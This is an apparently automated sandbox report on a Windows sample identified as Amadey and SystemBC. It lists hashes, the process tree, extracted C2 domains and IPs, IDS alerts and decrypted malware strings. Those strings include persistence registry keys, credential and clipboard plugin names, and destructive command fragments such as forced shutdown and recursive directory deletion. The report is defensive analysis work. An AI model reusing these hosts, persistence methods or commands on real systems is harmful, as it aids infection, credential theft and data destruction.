Edit tour

Windows Analysis Report
Fp80Ocyhqm.exe

Overview

General Information

Sample name:	Fp80Ocyhqm.exe renamed because original name is a hash value
Original sample name:	a9749ee52eefb0fd48a66527095354bb.exe
Analysis ID:	1631944
MD5:	a9749ee52eefb0fd48a66527095354bb
SHA1:	78170bcc54e1f774528dea3118b50ffc46064fe0
SHA256:	b1663d4497ddd27a59f090b72adcedddac51724a1c126f7d6469f8045d065e15
Tags:	exeuser-abuse_ch
Infos:

Detection

Amadey, SystemBC

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Amadey

Yara detected Amadeys Clipper DLL

Yara detected SystemBC

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Contains functionality to start a terminal service

Hides threads from debuggers

Joe Sandbox ML detected suspicious sample

PE file contains section with special chars

Sample uses string decryption to hide its real strings

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Abnormal high CPU Usage

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

Fp80Ocyhqm.exe (PID: 7468 cmdline: "C:\Users\user\Desktop\Fp80Ocyhqm.exe" MD5: A9749EE52EEFB0FD48A66527095354BB)

Gxtuum.exe (PID: 7524 cmdline: "C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe" MD5: A9749EE52EEFB0FD48A66527095354BB)

cubrodriver.exe (PID: 7764 cmdline: "C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe" MD5: 190272EBD2E82A80B242B1BDD442B859)

Gxtuum.exe (PID: 7592 cmdline: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe MD5: A9749EE52EEFB0FD48A66527095354BB)

Gxtuum.exe (PID: 7680 cmdline: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe MD5: A9749EE52EEFB0FD48A66527095354BB)

fvvb.exe (PID: 7904 cmdline: C:\ProgramData\giab\fvvb.exe MD5: 190272EBD2E82A80B242B1BDD442B859)

Gxtuum.exe (PID: 2740 cmdline: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe MD5: A9749EE52EEFB0FD48A66527095354BB)

Gxtuum.exe (PID: 1868 cmdline: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe MD5: A9749EE52EEFB0FD48A66527095354BB)

Gxtuum.exe (PID: 5108 cmdline: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe MD5: A9749EE52EEFB0FD48A66527095354BB)

Gxtuum.exe (PID: 7880 cmdline: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe MD5: A9749EE52EEFB0FD48A66527095354BB)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/40483/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
SystemBC	SystemBC is a multiplatform proxy malware active since August 2019. It creates SOCKS5 network tunnels in the victims network and connects to its C2 server using a custom, RC4-encrypted protocol. It can also download and execute additional malware, with payloads either written to disk or mapped into memory. The SystemBC kit, including the C2 panel, server, and malware executables, is sold in underground forums.	No Attribution	https://asec.ahnlab.com/en/33600/ https://blog.reversinglabs.com/blog/code-reuse-across-packers-and-dll-loaders https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html https://blogs.vmware.com/security/2023/06/8base-ransomware-a-heavy-hitting-player.html https://cloud.google.com/blog/topics/threat-intelligence/unc4393-goes-gently-into-silentnight	https://malpedia.caad.fkie.fraunhofer.de/details/win.systembc

Malware Configuration

Threatname: Amadey

{"C2 url": "cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.php", "Version": "5.21", "Install Folder": "a58456755d", "Install File": "Gxtuum.exe"}

Threatname: SystemBC

{"HOST1": "towerbingobongoboom.com", "HOST2": "62.60.226.86"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
Fp80Ocyhqm.exe	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000006.00000003.1487197253.0000000004774000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SystemBC	Yara detected SystemBC	Joe Security
00000005.00000003.1433439906.0000000004774000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SystemBC	Yara detected SystemBC	Joe Security
Process Memory Space: cubrodriver.exe PID: 7764	JoeSecurity_SystemBC	Yara detected SystemBC	Joe Security
Process Memory Space: fvvb.exe PID: 7904	JoeSecurity_SystemBC	Yara detected SystemBC	Joe Security
decrypted.memstr	JoeSecurity_Amadey_4	Yara detected Amadey	Joe Security

Unpacked PEs

Source	Rule	Description	Author
4.2.Gxtuum.exe.410000.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
3.0.Gxtuum.exe.410000.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
13.2.Gxtuum.exe.410000.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
13.0.Gxtuum.exe.410000.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
9.2.Gxtuum.exe.410000.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
1.0.Gxtuum.exe.410000.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
1.2.Gxtuum.exe.410000.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
12.2.Gxtuum.exe.410000.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
12.0.Gxtuum.exe.410000.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
4.0.Gxtuum.exe.410000.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
9.0.Gxtuum.exe.410000.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
0.0.Fp80Ocyhqm.exe.60000.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
3.2.Gxtuum.exe.410000.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
0.2.Fp80Ocyhqm.exe.60000.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
14.2.Gxtuum.exe.410000.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
14.0.Gxtuum.exe.410000.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
Click to see the 11 entries

Suricata Signatures

ETPRO MALWARE Amadey CnC Activity M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T17:36:58.549515+0100	2856147	1	A Network Trojan was detected	192.168.2.6	49688	107.189.27.66	80	TCP

ETPRO MALWARE Amadey CnC Activity M4

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T17:37:00.686629+0100	2856148	1	A Network Trojan was detected	192.168.2.6	49689	107.189.27.66	80	TCP
2025-03-07T17:37:13.439694+0100	2856148	1	A Network Trojan was detected	192.168.2.6	49693	107.189.27.66	80	TCP
2025-03-07T17:37:17.878782+0100	2856148	1	A Network Trojan was detected	192.168.2.6	49697	107.189.27.66	80	TCP
2025-03-07T17:37:22.315599+0100	2856148	1	A Network Trojan was detected	192.168.2.6	49699	107.189.27.66	80	TCP
2025-03-07T17:37:26.719338+0100	2856148	1	A Network Trojan was detected	192.168.2.6	49701	107.189.27.66	80	TCP
2025-03-07T17:37:31.201875+0100	2856148	1	A Network Trojan was detected	192.168.2.6	49703	107.189.27.66	80	TCP
2025-03-07T17:37:35.660532+0100	2856148	1	A Network Trojan was detected	192.168.2.6	49706	107.189.27.66	80	TCP
2025-03-07T17:37:40.175519+0100	2856148	1	A Network Trojan was detected	192.168.2.6	49709	107.189.27.66	80	TCP
2025-03-07T17:37:44.655033+0100	2856148	1	A Network Trojan was detected	192.168.2.6	49711	107.189.27.66	80	TCP
2025-03-07T17:37:49.106611+0100	2856148	1	A Network Trojan was detected	192.168.2.6	49713	107.189.27.66	80	TCP
2025-03-07T17:37:53.566912+0100	2856148	1	A Network Trojan was detected	192.168.2.6	49715	107.189.27.66	80	TCP
2025-03-07T17:37:58.070062+0100	2856148	1	A Network Trojan was detected	192.168.2.6	49717	107.189.27.66	80	TCP
2025-03-07T17:38:02.587632+0100	2856148	1	A Network Trojan was detected	192.168.2.6	49719	107.189.27.66	80	TCP
2025-03-07T17:38:07.145462+0100	2856148	1	A Network Trojan was detected	192.168.2.6	49722	107.189.27.66	80	TCP
2025-03-07T17:38:11.583261+0100	2856148	1	A Network Trojan was detected	192.168.2.6	49724	107.189.27.66	80	TCP
2025-03-07T17:38:16.056143+0100	2856148	1	A Network Trojan was detected	192.168.2.6	49726	107.189.27.66	80	TCP
2025-03-07T17:38:20.579050+0100	2856148	1	A Network Trojan was detected	192.168.2.6	49728	107.189.27.66	80	TCP
2025-03-07T17:38:25.156858+0100	2856148	1	A Network Trojan was detected	192.168.2.6	49730	107.189.27.66	80	TCP
2025-03-07T17:38:29.716871+0100	2856148	1	A Network Trojan was detected	192.168.2.6	49732	107.189.27.66	80	TCP
2025-03-07T17:38:34.243492+0100	2856148	1	A Network Trojan was detected	192.168.2.6	49734	107.189.27.66	80	TCP
2025-03-07T17:38:38.693125+0100	2856148	1	A Network Trojan was detected	192.168.2.6	49736	107.189.27.66	80	TCP
2025-03-07T17:38:43.148845+0100	2856148	1	A Network Trojan was detected	192.168.2.6	49738	107.189.27.66	80	TCP
2025-03-07T17:38:47.674958+0100	2856148	1	A Network Trojan was detected	192.168.2.6	49740	107.189.27.66	80	TCP
2025-03-07T17:38:52.203997+0100	2856148	1	A Network Trojan was detected	192.168.2.6	49742	107.189.27.66	80	TCP
2025-03-07T17:38:56.689047+0100	2856148	1	A Network Trojan was detected	192.168.2.6	49744	107.189.27.66	80	TCP
2025-03-07T17:39:01.428911+0100	2856148	1	A Network Trojan was detected	192.168.2.6	49746	107.189.27.66	80	TCP
2025-03-07T17:39:06.905686+0100	2856148	1	A Network Trojan was detected	192.168.2.6	49748	107.189.27.66	80	TCP
2025-03-07T17:39:11.525191+0100	2856148	1	A Network Trojan was detected	192.168.2.6	49750	107.189.27.66	80	TCP
2025-03-07T17:39:15.928440+0100	2856148	1	A Network Trojan was detected	192.168.2.6	49752	107.189.27.66	80	TCP
2025-03-07T17:39:20.393256+0100	2856148	1	A Network Trojan was detected	192.168.2.6	49754	107.189.27.66	80	TCP
2025-03-07T17:39:24.854747+0100	2856148	1	A Network Trojan was detected	192.168.2.6	49756	107.189.27.66	80	TCP
2025-03-07T17:39:29.289247+0100	2856148	1	A Network Trojan was detected	192.168.2.6	49758	107.189.27.66	80	TCP
2025-03-07T17:39:33.681471+0100	2856148	1	A Network Trojan was detected	192.168.2.6	49760	107.189.27.66	80	TCP
2025-03-07T17:39:38.309309+0100	2856148	1	A Network Trojan was detected	192.168.2.6	49762	107.189.27.66	80	TCP
2025-03-07T17:39:42.792835+0100	2856148	1	A Network Trojan was detected	192.168.2.6	49764	107.189.27.66	80	TCP
2025-03-07T17:39:47.383982+0100	2856148	1	A Network Trojan was detected	192.168.2.6	49766	107.189.27.66	80	TCP
2025-03-07T17:39:52.102613+0100	2856148	1	A Network Trojan was detected	192.168.2.6	49768	107.189.27.66	80	TCP
2025-03-07T17:39:56.634897+0100	2856148	1	A Network Trojan was detected	192.168.2.6	49770	107.189.27.66	80	TCP
2025-03-07T17:40:01.479543+0100	2856148	1	A Network Trojan was detected	192.168.2.6	49772	107.189.27.66	80	TCP
2025-03-07T17:40:06.072505+0100	2856148	1	A Network Trojan was detected	192.168.2.6	49774	107.189.27.66	80	TCP
2025-03-07T17:40:10.498250+0100	2856148	1	A Network Trojan was detected	192.168.2.6	49776	107.189.27.66	80	TCP
2025-03-07T17:40:14.980314+0100	2856148	1	A Network Trojan was detected	192.168.2.6	49778	107.189.27.66	80	TCP
2025-03-07T17:40:19.371150+0100	2856148	1	A Network Trojan was detected	192.168.2.6	49780	107.189.27.66	80	TCP
2025-03-07T17:40:23.805945+0100	2856148	1	A Network Trojan was detected	192.168.2.6	49782	107.189.27.66	80	TCP
2025-03-07T17:40:28.226940+0100	2856148	1	A Network Trojan was detected	192.168.2.6	49784	107.189.27.66	80	TCP
2025-03-07T17:40:32.648627+0100	2856148	1	A Network Trojan was detected	192.168.2.6	49786	107.189.27.66	80	TCP
2025-03-07T17:40:37.108189+0100	2856148	1	A Network Trojan was detected	192.168.2.6	49788	107.189.27.66	80	TCP
2025-03-07T17:40:41.556710+0100	2856148	1	A Network Trojan was detected	192.168.2.6	49790	107.189.27.66	80	TCP
2025-03-07T17:40:45.946052+0100	2856148	1	A Network Trojan was detected	192.168.2.6	49792	107.189.27.66	80	TCP
2025-03-07T17:40:50.510586+0100	2856148	1	A Network Trojan was detected	192.168.2.6	49794	107.189.27.66	80	TCP
2025-03-07T17:40:54.953044+0100	2856148	1	A Network Trojan was detected	192.168.2.6	49796	107.189.27.66	80	TCP
2025-03-07T17:40:59.610016+0100	2856148	1	A Network Trojan was detected	192.168.2.6	49798	107.189.27.66	80	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T17:37:02.924068+0100	2803305	3	Unknown Traffic	192.168.2.6	49690	45.59.120.8	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Fp80Ocyhqm.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.phpH	Avira URL Cloud: Label: malware
Source: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.phpF	Avira URL Cloud: Label: malware
Source: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.phpekjlfnvtgpegkwr.xyz5	Avira URL Cloud: Label: malware
Source: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.phpI	Avira URL Cloud: Label: malware
Source: towerbingobongoboom.com	Avira URL Cloud: Label: malware
Source: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.phpheR	Avira URL Cloud: Label: malware
Source: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.phpSA1	Avira URL Cloud: Label: malware
Source: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.phpqA_	Avira URL Cloud: Label: malware
Source: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.phpeK	Avira URL Cloud: Label: malware
Source: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.phpekjlfnvtgpegkwr.xyz	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe

Avira: detection malicious, Label: TR/AVI.Amadey.dzcps

Found malware configuration

Source: Fp80Ocyhqm.exe	Malware Configuration Extractor: Amadey {"C2 url": "cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.php", "Version": "5.21", "Install Folder": "a58456755d", "Install File": "Gxtuum.exe"}
Source: 00000006.00000003.1487197253.0000000004774000.00000004.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: SystemBC {"HOST1": "towerbingobongoboom.com", "HOST2": "62.60.226.86"}

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\giab\fvvb.exe	ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\cubrodriver[1].exe	ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	ReversingLabs: Detection: 44%

Multi AV Scanner detection for submitted file

Source: Fp80Ocyhqm.exe	Virustotal: Detection: 79%			Perma Link
Source: Fp80Ocyhqm.exe	ReversingLabs: Detection: 81%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Sample uses string decryption to hide its real strings

Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp	String decryptor: cobolrationumelawrtewarms.com
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp	String decryptor: /3ofn3jf3e2ljk/index.php
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp	String decryptor: S-%lu-
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp	String decryptor: a58456755d
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp	String decryptor: Gxtuum.exe
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp	String decryptor: Startup
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp	String decryptor: cmd /C RMDIR /s/q
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp	String decryptor: rundll32
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp	String decryptor: Programs
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp	String decryptor: %USERPROFILE%
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp	String decryptor: cred.dll\|clip.dll\|
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp	String decryptor: cred.dll
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp	String decryptor: clip.dll
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp	String decryptor: http://
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp	String decryptor: https://
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp	String decryptor: /quiet
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp	String decryptor: /Plugins/
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp	String decryptor: &unit=
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp	String decryptor: shell32.dll
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp	String decryptor: kernel32.dll
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp	String decryptor: GetNativeSystemInfo
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp	String decryptor: ProgramData\
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp	String decryptor: AVAST Software
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp	String decryptor: Kaspersky Lab
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp	String decryptor: Panda Security
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp	String decryptor: Doctor Web
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp	String decryptor: 360TotalSecurity
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp	String decryptor: Bitdefender
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp	String decryptor: Norton
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp	String decryptor: Sophos
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp	String decryptor: Comodo
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp	String decryptor: WinDefender
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp	String decryptor: 0123456789
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp	String decryptor: ------
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp	String decryptor: ?scr=1
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp	String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp	String decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp	String decryptor: ComputerName
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp	String decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp	String decryptor: -unicode-
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp	String decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp	String decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp	String decryptor: VideoID
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp	String decryptor: DefaultSettings.XResolution
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp	String decryptor: DefaultSettings.YResolution
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp	String decryptor: ProductName
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp	String decryptor: CurrentBuild
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp	String decryptor: rundll32.exe
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp	String decryptor: "taskkill /f /im "
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp	String decryptor: " && timeout 1 && del
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp	String decryptor: && Exit"
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp	String decryptor: " && ren
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp	String decryptor: Powershell.exe
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp	String decryptor: -executionpolicy remotesigned -File "
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp	String decryptor: shutdown -s -t 0
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp	String decryptor: random
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp	String decryptor: Keyboard Layout\Preload
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp	String decryptor: 00000419
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp	String decryptor: 00000422
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp	String decryptor: 00000423
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp	String decryptor: 0000043f

Source: Fp80Ocyhqm.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: Fp80Ocyhqm.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe	Code function: 0_2_0009F011 FindFirstFileExW,	0_2_0009F011
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: 1_2_0044F011 FindFirstFileExW,	1_2_0044F011
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: 3_2_0044F011 FindFirstFileExW,	3_2_0044F011

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49689 -> 107.189.27.66:80
Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.6:49688 -> 107.189.27.66:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49697 -> 107.189.27.66:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49699 -> 107.189.27.66:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49693 -> 107.189.27.66:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49703 -> 107.189.27.66:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49706 -> 107.189.27.66:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49717 -> 107.189.27.66:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49713 -> 107.189.27.66:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49711 -> 107.189.27.66:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49719 -> 107.189.27.66:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49715 -> 107.189.27.66:80
